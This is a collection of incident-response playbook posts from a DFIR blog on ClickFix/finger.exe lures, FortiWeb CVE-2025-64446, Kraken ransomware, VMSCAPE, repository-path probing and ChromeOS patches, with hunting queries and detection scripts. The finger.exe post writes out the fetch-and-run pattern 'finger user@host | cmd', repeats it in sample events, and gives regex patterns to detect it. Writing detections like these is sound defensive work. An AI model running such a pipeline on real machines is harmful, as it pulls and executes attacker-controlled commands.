Incident-Response

IR playbook for investigating and containing the KongTuke (aka LandUpdate808/TAG‑124) lure using fake CAPTCHA + ClickFix clipboard inject...

KongTuke/TAG‑124 fake CAPTCHA → ClickFix chain drops Python payload via PowerShell

4n6 Beat
5 min read

SANS ISC documented a fresh KongTuke lure on November 18, 2025 that uses a fake CAPTCHA page and a ClickFix-style clipboard injection to run a PowerShell one-liner, which pulls a ZIP containing a malicious Python script and a bundled Windows Python runtime. Post-infection artifacts land under AppData\Roaming\DATA with persistence via a Scheduled Task; IOCs include multiple paths on 64.111.92[.]212:6655 and later HTTPS to telegra.ph, which itself is legitimate infrastructure often abused as an intermediary. See the primary diary for details and hashes (SANS ISC).

A concise IR playbook for the FortiWeb auth‑bypass now in the wild and a quick win for detecting ClickFix lures abusing finger.exe (TCP/79).

FortiWeb CVE-2025-64446 is being mass‑exploited; hunt for admin impersonation and ClickFix over finger.exe

4n6 Beat
4 min read

Fortinet has acknowledged active exploitation of a FortiWeb GUI path traversal that lets an unauthenticated attacker reach a CGI endpoint and impersonate users, including admins, to run privileged actions such as creating new administrator accounts (CVE-2025-64446) (Fortinet PSIRT FG-IR-25-910; NVD entry). SANS ISC’s Stormcast on November 17, 2025 highlighted widespread scanning and recommended treating exposed, unpatched appliances as compromised until proven otherwise (SANS Stormcast 2025-11-17). In parallel, ClickFix lures are leveraging Windows finger.exe to fetch follow-on commands over the legacy Finger protocol, making egress on TCP/79 a simple detection point (SANS ISC diary; BleepingComputer).

DFIR playbook for ClickFix campaigns that abuse Windows finger.exe over the Finger protocol (TCP/79), with concrete artifacts, hunts, and...

ClickFix pivots to finger.exe: how to spot and stop TCP/79 script fetches

4n6 Beat
4 min read

SANS Internet Storm Center reports that current ClickFix campaigns are abusing the built-in Windows finger.exe client to retrieve attacker-hosted scripts over the legacy Finger protocol. The tool isn’t proxy-aware and the destination port is fixed to 79/TCP, which means well-configured explicit egress proxies that block TCP/79 will break this stage. (isc.sans.edu)

Intrusion Flow

  • Initial social engineering. ClickFix pages masquerade as “human verification” or problem/solution flows that preload a command into the clipboard and instruct the user to paste and run it. Recent variants add OS detection, countdown timers, and even video instructions to increase compliance. (bleepingcomputer.com)
  • Fetch via Finger. In the finger.exe-enabled branch, the lure runs a command that uses Finger to pull a remote command stream and then pipes it into a shell for execution (for example, finger user@host | cmd). BleepingComputer documented live samples where the finger output is piped to cmd.exe to stage additional tooling. (bleepingcomputer.com)
  • Payload staging. Observed scripts create working directories, rename built-in utilities (for example, curl.exe) and fetch archives masquerading as benign files, expanding to stealer or RAT payloads. (bleepingcomputer.com)
  • Evolution to FileFix. Some crews now avoid terminals entirely, abusing the File Explorer address bar to execute hidden PowerShell (FileFix) as an evolution of the same idea. Expect the Finger fetch step to be swapped for other low-visibility transports over time. (bleepingcomputer.com)

Key Artifacts to Pull

  • Process execution
    • Windows Security Event ID 4688 with command line (enable “Include command line in process creation events”). Hunt for finger.exe and any pipeline to cmd.exe/PowerShell. (learn.microsoft.com)
    • Sysmon Event ID 1 (ProcessCreate) for C:\Windows\System32\finger.exe and parent lineage (browser → cmd.exe → finger.exe, etc.). (learn.microsoft.com)
  • Network evidence
    • Sysmon Event ID 3 (NetworkConnect) showing outbound TCP connections to remote port 79 with Image ...\finger.exe. (system32.eventsentry.com)
    • Windows Filtering Platform (WFP) events if “Audit Filtering Platform Connection” is enabled: 5156 (allowed) and 5157 (blocked), which include app path, IPs, and ports. (windows-security.org)
    • Host firewall logs (pfirewall*.log) if “log successful connections” and/or “log dropped packets” is enabled. (learn.microsoft.com)
  • Disk artifacts (execution evidence)
    • Prefetch: FINGER.EXE-*.pf under C:\Windows\Prefetch (run count and up to eight last-run timestamps on Win 8+). (magnetforensics.com)
    • Amcache: C:\Windows\AppCompat\Programs\Amcache.hve can record program presence (and sometimes execution metadata); treat it as corroboration, not sole proof of execution. (securelist.com)

Detection Notes

  • Microsoft Defender XDR (Advanced Hunting)
    • Process creation and network join:
      let lookback = 14d;
      let finger_execs = DeviceProcessEvents
        | where Timestamp > ago(lookback)
        | where FileName =~ "finger.exe";
      let finger_net = DeviceNetworkEvents
        | where Timestamp > ago(lookback)
        | where RemotePort == 79 and Protocol =~ "Tcp";
      finger_execs
        | project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine, FolderPath, ProcessId
        | join kind=leftouter (
            finger_net | project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessId, InitiatingProcessCommandLine
          ) on $left.DeviceName == $right.DeviceName, $left.ProcessId == $right.InitiatingProcessId
        | order by Timestamp desc
      
      Uses DeviceProcessEvents and DeviceNetworkEvents schemas. (learn.microsoft.com)
    • Suspicious pipeline usage:
      DeviceProcessEvents
      | where Timestamp > ago(14d)
      | where FileName =~ "cmd.exe" or FileName =~ "powershell.exe"
      | where ProcessCommandLine has "finger " and ProcessCommandLine contains "|"
      
      Back this with network to TCP/79 where available. (learn.microsoft.com)
  • Windows Eventing/Sysmon
    • Enable Security 4688 with command line and Sysmon IDs 1 and 3; filter on Image endswith \\finger.exe and DestinationPort = 79. (learn.microsoft.com)
  • Packet capture/NIDS
    • Finger is TCP/79; on packet tools, filter tcp.port == 79. Zeek has historically provided a Finger analyzer, but check your version and plugin set: many deployments will simply rely on conn.log for port 79 traffic. (iana.org)
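The two Advanced Hunting queries above express the same logic: flag any command line that pipes Finger output into a shell, and correlate finger.exe process creations with TCP/79 network connections. The Python below is an added example (not code from the 4n6 Beat post or from SANS ISC) that runs that logic over Sysmon-style records so it can be applied to exported EVTX/JSON outside Defender. The sample events, hostnames, PIDs and IPs are constructed for the example and are not IOCs from the reporting; "internal" is defined as RFC 1918, loopback or link-local, which is an assumption you may need to widen for your own address plan.

```python
import ipaddress
import re
from collections import defaultdict

# A Finger fetch: "finger [-l] user@host" appearing as its own token in a command line.
FINGER_CMD = re.compile(r'(?i)(?:^|[\s"\'(&;])finger(?:\.exe)?\s+(?:-l\s+)?\S*@\S+')
# The fetched text being piped into a shell, with or without a path to the shell binary.
PIPE_TO_SHELL = re.compile(r'(?i)\|\s*(?:"?[^|"]*\\)?(?:cmd|powershell|pwsh)(?:\.exe)?\b')

# "Internal" = RFC 1918, loopback, link-local (assumption; widen for your own address plan).
# Deliberately not ipaddress.is_private, which also classifies the documentation ranges
# used in the constructed sample below as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}

# Constructed Sysmon-style records (EventID 1 = ProcessCreate, 3 = NetworkConnect).
# Hosts, PIDs, domains and IPs are invented for this example and are not IOCs.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "ProcessId": 4120, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "cmd.exe /c finger user@example.invalid | cmd"},
    {"EventID": 1, "Computer": "WS01", "ProcessId": 4188, "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "finger  user@example.invalid"},
    {"EventID": 3, "Computer": "WS01", "ProcessId": 4188, "Image": r"C:\Windows\System32\finger.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 79, "Protocol": "tcp"},
    {"EventID": 1, "Computer": "WS02", "ProcessId": 900, "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "finger ops@intranet.example.invalid"},
    {"EventID": 3, "Computer": "WS02", "ProcessId": 900, "Image": r"C:\Windows\System32\finger.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 79, "Protocol": "tcp"},
    # Benign noise: contains the word "finger" and a pipe, but no Finger fetch.
    {"EventID": 1, "Computer": "WS03", "ProcessId": 77, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe /c dir | findstr finger"},
]


def is_finger_pipeline(cmdline):
    """True when a command line fetches via Finger and pipes the result into cmd/PowerShell."""
    return bool(FINGER_CMD.search(cmdline) and PIPE_TO_SHELL.search(cmdline))


def is_finger_image(image):
    return image.lower().endswith("\\finger.exe")


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def hunt(events):
    """Return findings ranked by severity: shell pipelines, then finger.exe runs by where TCP/79 went."""
    # Index TCP/79 connections by (host, pid) so each process creation can be joined to its egress.
    net_by_proc = defaultdict(list)
    for ev in events:
        if (ev.get("EventID") == 3 and ev.get("DestinationPort") == 79
                and str(ev.get("Protocol", "")).lower() == "tcp"):
            net_by_proc[(ev["Computer"], ev["ProcessId"])].append(ev["DestinationIp"])

    findings = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        dests = net_by_proc.get((ev["Computer"], ev["ProcessId"]), [])
        cmdline = ev.get("CommandLine", "")
        if is_finger_pipeline(cmdline):
            severity, reason = "high", "finger output piped into a shell"
        elif is_finger_image(ev.get("Image", "")):
            external = [d for d in dests if not is_internal(d)]
            if external:
                severity, reason = "high", "finger.exe with TCP/79 egress to a non-internal address"
            elif dests:
                severity, reason = "medium", "finger.exe with TCP/79 to an internal address"
            else:
                severity, reason = "low", "finger.exe executed, no TCP/79 connection seen"
        else:
            continue
        findings.append({"host": ev["Computer"], "pid": ev["ProcessId"], "severity": severity,
                         "reason": reason, "parent": ev.get("ParentImage", ""),
                         "command": cmdline, "destinations": dests})
    findings.sort(key=lambda f: SEVERITY_RANK[f["severity"]])  # stable: keeps event order within a tier
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']} pid={f['pid']} {f['reason']} "
              f"parent={f['parent']} dst={f['destinations']}")
```

The parent image is carried into each finding because the browser → cmd.exe → finger.exe lineage noted under Key Artifacts is what separates a ClickFix victim from an administrator who legitimately ran Finger against an internal host.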

Response Guidance

  • Contain egress on TCP/79
    • The attacking step depends on direct TCP/79 to the Internet. Block 79/TCP egress from user segments at your perimeter and host firewalls. This aligns with baseline control guidance to default-deny outbound on endpoints and only allow required services. (isc.sans.edu)
    • Example (local host firewall, admin CMD):
      netsh advfirewall firewall add rule name="Block TCP79 Outbound" dir=out action=block protocol=TCP remoteport=79
      
      Or deploy an outbound port rule via GPO/MDM at scale. (learn.microsoft.com)
  • Proxy design
    • finger.exe is not proxy-aware; in environments with explicit proxies and default-deny egress, the fetch will fail. In transparent proxy setups, ensure port 79 is denied outbound. (isc.sans.edu)
  • Endpoint hardening
    • Where feasible, block or tightly scope finger.exe via AppLocker/WDAC policy (publisher/path/hash rule), while monitoring for operational impact. (learn.microsoft.com)
  • Host triage
    • Isolate the system; collect Security 4688, WFP 5156/5157, Sysmon 1/3, Prefetch, Amcache, and firewall logs. Review the parent chain that launched finger.exe and any subsequent curl/PowerShell activity to determine secondary payloads. (learn.microsoft.com)
  • User comms
    • Re-educate on ClickFix patterns: fake Cloudflare checks, clipboard-injected commands, “Win+R → Ctrl+V → Enter,” and the Explorer address-bar variant (FileFix). (securityweek.com)

Takeaways

  • Add hunts and detections for finger.exe execution and outbound TCP/79 connections; block TCP/79 egress broadly. (isc.sans.edu)
  • Treat any finger ... | cmd/PowerShell pipeline as high-signal and pivot to payload retrieval and persistence checks. (bleepingcomputer.com)
  • Reinforce application control and user training to blunt evolving ClickFix/FileFix social-engineering chains. (bleepingcomputer.com)

Active exploitation of Fortinet FortiWeb CVE-2025-64446 lets unauthenticated attackers reach fwbcgi and impersonate users via a Base64 CG...

FortiWeb CVE-2025-64446: Path Traversal + CGI impersonation yields admin on-box

4n6 Beat
5 min read

On November 14, 2025, watchTowr published a hands-on analysis of Fortinet FortiWeb CVE-2025-64446 showing an auth bypass chain: a path traversal to the fwbcgi binary, plus a crafted Base64-encoded CGIINFO header that causes user impersonation and enables privileged actions like creating local admin accounts (watchTowr write-up). Fortinet has issued PSIRT advisory FG-IR-25-910 for CVE-2025-64446, with fixes in 8.0.2 and corresponding maintenance branches; multiple CERTs note active exploitation (CERT-FR bulletin, Canadian Centre for Cyber Security alert, and NVD entry). (labs.watchtowr.com)

Cisco Talos and others report that Kraken now profiles each host to select encryption mode and threading. Here’s a concise IR playbook fo...

Kraken ransomware adds CPU/IO benchmarking—what to hunt before the encryptor runs

4n6 Beat
5 min read

On November 13, 2025, reporting highlighted that the cross-platform Kraken ransomware profiles victim machines first, benchmarking disk/CPU to choose between full or partial encryption and tune threads to avoid tripping resource alarms (BleepingComputer). Cisco Talos’ deep dive confirms host-side performance tests via a temporary file and command-line switches, plus distinct encryptors for Windows and Linux/VMware ESXi that append “.zpsc” and drop “readme_you_ws_hacked.txt” (Talos). Talos also notes ties to the older HelloKitty operation and a Kraken-hosted forum announcement (“The Last Haven Board”), a link also observed by independent analysis of Kraken’s leak site (Talos, Cyjax).

Microsoft’s Nov 11, 2025 updates fix 63 CVEs and an in‑the‑wild Windows Kernel race‑condition LPE (CVE‑2025‑62215). Here’s a succinct IR...

CVE-2025-62215: Windows Kernel LPE zero‑day in November Patch Tuesday — what DFIR should collect and detect

4n6 Beat
5 min read

Microsoft’s November 11, 2025 Patch Tuesday addressed 63 vulnerabilities and one actively exploited Windows Kernel local privilege escalation tracked as CVE-2025-62215, a race-condition bug enabling SYSTEM after an attacker wins a concurrency window locally. Microsoft credits MSTIC and MSRC for discovery, and the flaw is rated CVSS 7.0 (important) with active exploitation confirmed. DFIR teams should expect this to be used post-compromise to elevate from a low-priv foothold. Patch fast, and hunt for privilege jumps and follow-on activity. (BleepingComputer, The Hacker News, Tenable, NVD)

DFIR playbook for investigating a North Korea–linked campaign that steals Google credentials via signed MSI→AutoIt loaders on Windows, th...

APT37/KONNI abuse Google Find Hub to factory‑reset Androids mid‑intrusion

4n6 Beat
5 min read

North Korea-linked operators in the KONNI/APT37 orbit used stolen Google credentials to log into Google’s Find Hub and remotely trigger factory resets on victims’ Android phones and tablets, timing the wipes after checking GPS location to isolate targets and delay response (BleepingComputer, Nov 10, 2025; Genians Security Center report). Find Hub is Google’s rebranded “Find My Device” service that supports locating, locking, and erasing devices (Google Find Hub about; Android Authority rebrand coverage).

What DFIR teams on Ubuntu hosts should do about VMSCAPE cross‑VM data exposure and how to verify mitigations after patching.

Ubuntu’s USN‑7860‑5 patches VMSCAPE (CVE‑2025‑40300) in HWE kernels: DFIR response notes

4n6 Beat
4 min read

Canonical published USN-7860-5 on November 10, 2025 for Ubuntu 24.04 LTS HWE (6.14) to mitigate VMSCAPE (CVE-2025-40300), a Spectre-class issue where insufficient branch-predictor isolation lets a guest VM influence host userspace execution and leak data from processes like QEMU. The notice requires updating to 6.14.0-35 and rebooting; it also flags an ABI bump that will rebuild third-party kernel modules. (ubuntu.com)

Intrusion Flow

  • Guest training: A malicious guest poisons branch-predictor state (vBTI) while executing under KVM. On VMEXIT, host userspace (e.g., QEMU) runs with the tainted predictor, enabling Spectre-BTI-style mis-speculation and data disclosure via a cache side channel. (intel.com)
  • Target surface: The attack impacts userspace hypervisors; existing kernel/KVM Spectre defenses are not sufficient because the userspace VMM can run immediately after VMEXIT without a context switch. (ubuntu.com)
  • Practicality: Researchers report end-to-end exfiltration from a host userspace hypervisor, with measured leak rates on modern CPUs in public write-ups. (linuxjournal.com)
  • Affected CPUs: Kernel documentation lists Intel Skylake (parts without eIBRS), Cascade Lake (ITS guest/host separation), and Alder Lake and newer (BHI), plus AMD Zen families 0x17/0x19/0x1a and Hygon 0x18. Some BHI-affected Intel parts using BHB clearing (e.g., Icelake) are not vulnerable. (docs.kernel.org)
  • Kernel mitigation model: Linux adds conditional branch-predictor flushing around VMEXIT (an IBPB before returning to userspace) and offers a more aggressive IBPB-on-every-VMEXIT mode; vendors note that existing BTI/BHI guidance applies. (docs.kernel.org)
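The USN requires 6.14.0-35 plus a reboot, and the mitigation is only in effect once that kernel is the one actually running. The following is an added example (not code from the 4n6 Beat post or from Canonical) that makes both checks scriptable for a fleet: compare the running kernel's ABI against the fixed release, flag a newer installed kernel that is still waiting for a reboot, and read the sysfs vulnerability entries so any "Vulnerable" status stands out. The sysfs directory is the standard /sys/devices/system/cpu/vulnerabilities; the `vmscape` entry name follows the upstream admin-guide the post cites, but whether your kernel exposes it is something to confirm on the host. The sample sysfs text and statuses below are constructed for the example.

```python
import os
import re

REQUIRED_RELEASE = "6.14.0-35"                       # fixed 24.04 LTS HWE kernel per USN-7860-5
SYSFS_VULNS = "/sys/devices/system/cpu/vulnerabilities"
RELEASE_RE = re.compile(r'^(\d+)\.(\d+)\.(\d+)-(\d+)')

# Constructed sample in the shape of `grep -H . /sys/devices/system/cpu/vulnerabilities/*`.
# Statuses are invented for the example; read your own hosts for real values.
SAMPLE_SYSFS = """\
/sys/devices/system/cpu/vulnerabilities/spectre_v2:Mitigation: Enhanced / Automatic IBRS; IBPB: conditional
/sys/devices/system/cpu/vulnerabilities/vmscape:Mitigation: IBPB before exit to userspace
/sys/devices/system/cpu/vulnerabilities/srbds:Not affected
/sys/devices/system/cpu/vulnerabilities/tsx_async_abort:Vulnerable
"""


def parse_release(release):
    """'6.14.0-35-generic' -> (6, 14, 0, 35). Raises ValueError for non-Ubuntu release strings."""
    m = RELEASE_RE.match(release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(x) for x in m.groups())


def running_is_patched(running, required=REQUIRED_RELEASE):
    """True when the running kernel is on the same upstream series and at or past the fixed ABI.

    A different series (another HWE or GA kernel) is covered by its own USN, so it is
    reported as not verified rather than silently accepted."""
    run, req = parse_release(running), parse_release(required)
    return run[:3] == req[:3] and run[3] >= req[3]


def check_host(running, installed, required=REQUIRED_RELEASE):
    """Combine the two post-patch questions: is the running kernel fixed, and is a reboot pending?"""
    newest = max(installed, key=parse_release)
    return {
        "running": running,
        "newest_installed": newest,
        "patched": running_is_patched(running, required),
        "reboot_pending": parse_release(newest) > parse_release(running),
    }


def parse_vulnerabilities(text):
    """Parse 'path:status' lines into {name: status}; split once, since statuses contain colons."""
    vulns = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        path, status = line.split(":", 1)
        vulns[os.path.basename(path)] = status.strip()
    return vulns


def unmitigated(vulns):
    """Names whose sysfs status begins with 'Vulnerable' (including 'Vulnerable: ...' variants)."""
    return sorted(name for name, status in vulns.items() if status.startswith("Vulnerable"))


def read_live_vulnerabilities(directory=SYSFS_VULNS):
    """Read the real sysfs entries on a Linux host; returns {} where the directory is absent."""
    vulns = {}
    try:
        for name in os.listdir(directory):
            with open(os.path.join(directory, name)) as fh:
                vulns[name] = fh.read().strip()
    except OSError:
        pass
    return vulns


if __name__ == "__main__":
    # Constructed scenario: the fixed kernel is installed but the host has not rebooted yet.
    print(check_host("6.14.0-33-generic", ["6.14.0-33-generic", "6.14.0-35-generic"]))
    live = read_live_vulnerabilities() or parse_vulnerabilities(SAMPLE_SYSFS)
    print("vmscape:", live.get("vmscape", "entry not present on this kernel"))
    print("unmitigated:", unmitigated(live))
```

On the hosts themselves, feed `uname -r` to `running` and the `linux-image-*` packages from dpkg to `installed`; a host that reports `patched: False, reboot_pending: True` has taken the update but is still exposed, which is exactly the state the ABI bump and reboot requirement in the notice are about.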

Key Artifacts to Pull

When you’re triaging Ubuntu virtualization hosts, collect:

Scanners are sweeping web servers for /.git, /.github, GitLab CI, SVN, and S3/AWS paths. This playbook shows how to hunt the requests in...

IR Playbook: Hunting Automated Probes for Exposed Repositories and Cloud Paths

4n6 Beat
5 min read

On November 8, 2025, the SANS Internet Storm Center reported honeypot hits probing common repository and cloud-related paths, including /.git/logs/refs/remotes/origin/main, /.git/objects/info, /.github/* (such as dependabot.yml), /.gitlab/*, /.gitlab-ci, /.git-secret, /.svnignore, and cloud-y paths like /aws/bucket, /s3/backup, /s3/bucket, /s3/credentials (ISC Diary). If any of these return 200s, you may be serving source, CI config, or credentials. The rest of this post walks through a fast, repeatable response.

Intrusion Flow

  • Recon and probing: Automated clients request telltale repo/CI paths such as /.git/HEAD, /.git/config, .github/*, .gitlab-ci*, .svn/*, or /s3/* looking for misdeployments (PortSwigger, GitHub Docs: dependabot.yml location, GitLab CI YAML).
  • Exploitation if exposed: If /.git/ is reachable, attackers can reconstruct history via targeted downloads (e.g., /.git/HEAD, refs, objects) or off-the-shelf dumpers (arthaud/git-dumper, GitTools). Advisory sites treat exposed VCS dirs as source disclosure risks (Acunetix on .git).
  • Post-exploitation: Harvest secrets embedded in history or CI files using secret scanners; leaked tokens often enable cloud pivots (Gitleaks, TruffleHog).
  • Cloud angle: Attackers also test S3 naming or credential endpoints; your guardrail here is account/bucket-level S3 Block Public Access, on by default for new buckets since April 28, 2023, and recommended broadly (AWS Prescriptive Guidance, S3 BPA user guide, AWS announcement).

Key Artifacts to Pull

  • Web access logs from the serving tier (reverse proxies, WAFs, app servers):
  • Server configs for containment validation:
    • NGINX: location ~ /\.(?!well-known) { deny all; } is a common pattern to block dotfiles while allowing ACME challenges (Bolt CMS nginx example).
    • Apache: <FilesMatch "^\."> Require all denied </FilesMatch> blocks dotfiles (Apache core).
  • Evidence if exposure occurred:
    • Sample served files (e.g., /.git/HEAD, /.git/config, .gitlab-ci.yml) for scoping; prefer capturing over-the-wire evidence and hash it in your case notes.
    • HTTP status codes context: 200 means the resource was served; 403 means refused; 404 means not found (MDN 200, MDN 403, MDN 404).

Detection Notes

The goal is to quickly identify requests to risky repo/CI/cloud paths and prioritize 200s.
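One way to do that over the access logs listed under Key Artifacts, as an added example (not code from the 4n6 Beat post or from SANS ISC): parse combined-format lines, normalise the request path (strip the query string, decode percent-encoding, collapse repeated slashes) so `/%2Egit/config` is not missed, match it against the path families from the diary, and report 2xx responses first, with a per-source count to see who is sweeping. The log lines, client addresses and timestamps are constructed for the example; the path patterns cover only the families the diary names and are an assumption to extend for your own deployments.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined/common log format: client, identity, user, [timestamp], "request", status, ...
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) ')

# Path families from the ISC diary, checked against the normalised request path.
# /.well-known/ is intentionally not listed, matching the NGINX dotfile exception above.
RISKY_PATHS = [
    ("git",        re.compile(r'^/\.git(?:/|$)')),
    ("git-secret", re.compile(r'^/\.git-secret(?:/|$)')),
    ("github",     re.compile(r'^/\.github(?:/|$)')),
    ("gitlab",     re.compile(r'^/\.gitlab(?:-ci)?(?:/|\.yml|$)')),
    ("svn",        re.compile(r'^/\.svn(?:ignore|/|$)')),
    ("aws-s3",     re.compile(r'^/(?:aws|s3)/(?:bucket|backup|credentials)(?:/|$)')),
]

# Constructed access log; addresses are from documentation ranges and are not real scanners.
SAMPLE_LOG = """\
198.51.100.7 - - [08/Nov/2025:10:15:01 +0000] "GET /.git/HEAD HTTP/1.1" 404 153 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Nov/2025:10:15:02 +0000] "GET /%2Egit/config HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Nov/2025:10:15:03 +0000] "GET /.github/dependabot.yml HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.0.2.44 - - [08/Nov/2025:10:16:10 +0000] "GET /s3/credentials?x=1 HTTP/1.1" 404 153 "-" "python-requests/2.31"
192.0.2.44 - - [08/Nov/2025:10:16:11 +0000] "GET /.gitlab-ci.yml HTTP/1.1" 200 540 "-" "python-requests/2.31"
192.0.2.44 - - [08/Nov/2025:10:16:12 +0000] "GET /.well-known/acme-challenge/token HTTP/1.1" 200 87 "-" "python-requests/2.31"
203.0.113.9 - - [08/Nov/2025:10:17:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def normalize_path(raw):
    """Drop the query string, decode percent-encoding, collapse repeated slashes."""
    path = unquote(raw.split("?", 1)[0])
    return re.sub(r'/+', '/', path)


def classify_path(raw):
    """Return the risky path family the request belongs to, or None for everything else."""
    path = normalize_path(raw)
    for name, pattern in RISKY_PATHS:
        if pattern.search(path):
            return name
    return None


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def hunt(lines):
    """Return risky-path hits, the subset that was actually served (2xx), and a per-source count."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        category = classify_path(rec["path"])
        if category is None:
            continue
        hits.append({"src": rec["src"], "ts": rec["ts"], "path": normalize_path(rec["path"]),
                     "status": rec["status"], "category": category})
    exposed = [h for h in hits if 200 <= h["status"] < 300]
    probers = Counter(h["src"] for h in hits)
    return {"hits": hits, "exposed": exposed, "probers": probers}


if __name__ == "__main__":
    result = hunt(SAMPLE_LOG.splitlines())
    for h in result["exposed"]:
        print(f"EXPOSED {h['status']} {h['path']} ({h['category']}) from {h['src']} at {h['ts']}")
    for src, n in result["probers"].most_common():
        print(f"prober {src}: {n} risky-path requests")
```

Run it against the reverse-proxy or WAF tier rather than only the origin, since a 403 from the proxy and a 200 from the app server for the same path tell different stories about where the control actually sits.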

Google’s November 7, 2025 ChromeOS LTS update fixes high‑severity flaws in Safe Browsing, Storage, V8, and libaom. Here’s the incident‑re...

ChromeOS LTS 138.0.7204.296: What DFIR Teams Should Pull, Check, and Enforce

4n6 Beat
4 min read

Google shipped ChromeOS Long-Term Support (LTS) 138.0.7204.296 (Platform 16295.81.0) on November 7, 2025, with security fixes for Safe Browsing (CVE-2025-11756), Storage (CVE-2025-11460), V8 (CVE-2025-12036), and libaom (CVE-2025-8879). Confirm the OS and platform versions during triage and push the update across your fleet. (chromereleases.googleblog.com)

Intrusion Flow

  • Likely initial vector: drive-by or content rendering via the Chrome browser on ChromeOS that triggers memory-safety bugs in browser components (Safe Browsing, Storage, V8) or the AV1 codec library (libaom), leading to crash or potential code execution in the browser context. Chrome Stable channel notes for CVE-2025-11756 (Safe Browsing) and CVE-2025-11460 (Storage) confirm high-severity use-after-free issues; CVE-2025-12036 is an “inappropriate implementation” in V8; CVE-2025-8879 is a heap buffer overflow in libaom. (chromereleases.googleblog.com)
  • On ChromeOS, crashes and related telemetry are collected by crash-reporter; browser and system crashes produce minidumps and logs in specific locations (see “Key Artifacts”). (chromium.googlesource.com)
  • Update application is handled by update_engine; successful or failed updates leave traces in update_engine logs. (chromium.googlesource.com)

Key Artifacts to Pull

  • Version and channel evidence
    • UI: Settings > About ChromeOS (records current ChromeOS version) and chrome://version (shows browser and platform versions). Capture screenshots or export the page during triage. (chromium.org)
    • Admin inventory: ChromeOS device records expose osVersion and platformVersion via the Directory API. Pull device lists or per-device records to validate fleet posture. (developers.google.com)
  • Update traces
    • update_engine logs at /var/log/update_engine and the active symlink /var/log/update_engine.log. These record payload URL, state transitions, success/failure, and rollback markers. (chromium.googlesource.com)
  • Browser/system logs
    • Chrome logs before login: /var/log/chrome/chrome; after login (non-test images): /home/chronos/user/log/chrome; early Chrome startup: /var/log/ui/ui.LATEST. (chromium.googlesource.com)
    • System logs: /var/log/messages and related rsyslog outputs can clarify browser startup/shutdown and service behavior. (chromium.googlesource.com)
  • Crash evidence
    • Crash report storage: system crashes in /var/spool/crash/; user-session crashes under /run/daemon-store/crash/<user_hash>/; logged-out Chrome crashes in /home/chronos/crash/. Also check /var/log/chrome/Crash\ Reports/uploads.log for upload status. (chromium.googlesource.com)
    • chrome://crashes shows IDs when user consented to crash reporting; minidumps can be symbolized with tast symbolize for deeper analysis. (chromium.org)

Detection Notes

  • Hunt for crash spikes or recurring signatures matching affected components:
    • Strings to grep in Chrome logs and minidumps: “SafeBrowsing”, “storage”, “V8”, “libaom”, “aom”. Combine with timestamps around user browsing sessions. Use Chrome logs and crash directories noted above. (chromium.googlesource.com)
  • Correlate update success/failure with exploitation windows:
    • Parse /var/log/update_engine.log for state=UPDATED_BUT_DEFERRED, failures, or rollbacks; align with crash timestamps to spot exposure pre-patch. (chromium.googlesource.com)
  • Fleet-level posture:
    • Query the Admin Directory API for devices not yet at Chrome 138.0.7204.296 (LTS milestone 138) using version search operators (example below). Device records also return platformVersion for cross-checks. (developers.google.com)

Example Directory API filter (Admin console/API search syntax supports prefix matching on Chrome version):